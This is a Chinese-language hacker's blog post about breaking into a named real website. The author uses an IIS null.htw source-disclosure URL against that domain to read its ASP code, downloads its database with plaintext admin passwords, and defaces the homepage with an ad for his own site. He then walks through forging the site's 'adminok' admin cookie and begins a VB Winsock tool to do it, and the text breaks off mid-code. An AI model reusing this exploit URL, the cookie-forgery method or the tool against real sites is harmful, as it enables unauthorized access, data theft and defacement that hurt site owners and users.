黑白我可是天天都会去的,他的软件下载用的是CGI来实现的,而首页更新和文章浏览部分则用的是ASP做的,程序是从ASP动网先锋的那里搞来的原程序。ASP动网先锋他们那里的这套ASP管理程序目前在网上非常的流行,我已经看到好多地方用来做自己的软件和文章管理程序了,其实我也忍不住下了一套改了改打算以后自己用的:)
好了,既然有时间就又忍不住想看看他们放ASP程序的主机有什么漏洞没,用我的打碎南瓜一试和~
马上就看到了原程序,地址:
http://www.guanqian.com/null.htw?CiWebHitsFile=/starkun/article/articleconn.asp%20&CiRestriction=none&CiHiliteType=Full
显示:
现在傻子也知道该怎么做了吧?把他们的数据库下来以后密码又是明文可见了,哎,想想自己那么努力建站可访问量又是不见起色,就忍不住偷偷在黑白的首页给自己做了广告厚着脸皮夸了自己那里一通(“不要脸,顿时西瓜皮从大家手中向我砸来”)
做完以后呢?当然是高高兴兴的上床睡我的大觉去了,现在北京好冷呀!被子里暖暖呼呼的感觉真好舒服。
不过今天回来一看,呀!星坤已经把首页上我们的捣乱记录都删掉了(在此期间还有几个大站的站长和我一样厚着脸皮去人家那里给自己做广告去了,就不点名批评了:)。当然还是有点不甘心呀,毕竟我的宣传广告才放了一天不到耶。怎么办?好再来试试看,可结果让人失望我用白鸽打碎南瓜 twwwscan05 都没有看到新的服务器有什么可以看到ASP原码的漏洞,而星坤也已经把数据库的名字改掉了,看来真要没办法了?!?!
快要放弃的时候想起来还可以再好好看看动网先锋那里的原程序,虽然数据库的路径有所改变但还应该有些地方可以利用的吧,果然看看下面的VB脚本的东西:
if request.cookies("adminok")="" then
response.redirect "login.asp"
end if
在重要管理ASP的程序里都会有这样的简单的判断语句来看看我们是否有改动的权限,如果没有就回到login.asp,在chklogin.asp里有下面的内容:
dim sql
dim rs
dim seekerrs
dim founduser
dim username
dim companyid
dim password
dim errmsg
dim founderr
founderr=false
FoundUser=false
username=trim(request("username"))
password=cstr(Request("password"))
set rs=server.createobject("adodb.recordset")
sql="select * from admin where id=1"
rs.open sql,conn,1,1
if not(rs.bof and rs.eof) then
if password=rs("password") and username=rs("username") then
response.cookies("adminok")=true 看到没有这里就是我们要伪造的身份证明!
response.redirect "manage.asp"
else
response.write ""
response.write ""
response.write "Sorry,请输入正确的管理员名字和密码"
end if
end if
rs.close
conn.close
set rs=nothing
set conn=nothing
好象我们已经找到了突破口了,如果还不明白的话就和我一起用VB来编个简单的程序:
Private Sub Command1_Click()
Winsock1.Connect
End Sub
Private Sub Form_Load()
Winsock1.Listen
winsock1.localport=80
End Sub
Private Sub Winsock1_Connect()
Winsock1.SendData Text1.Text
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then _
作者:SQL
主页:minisql.yeah.net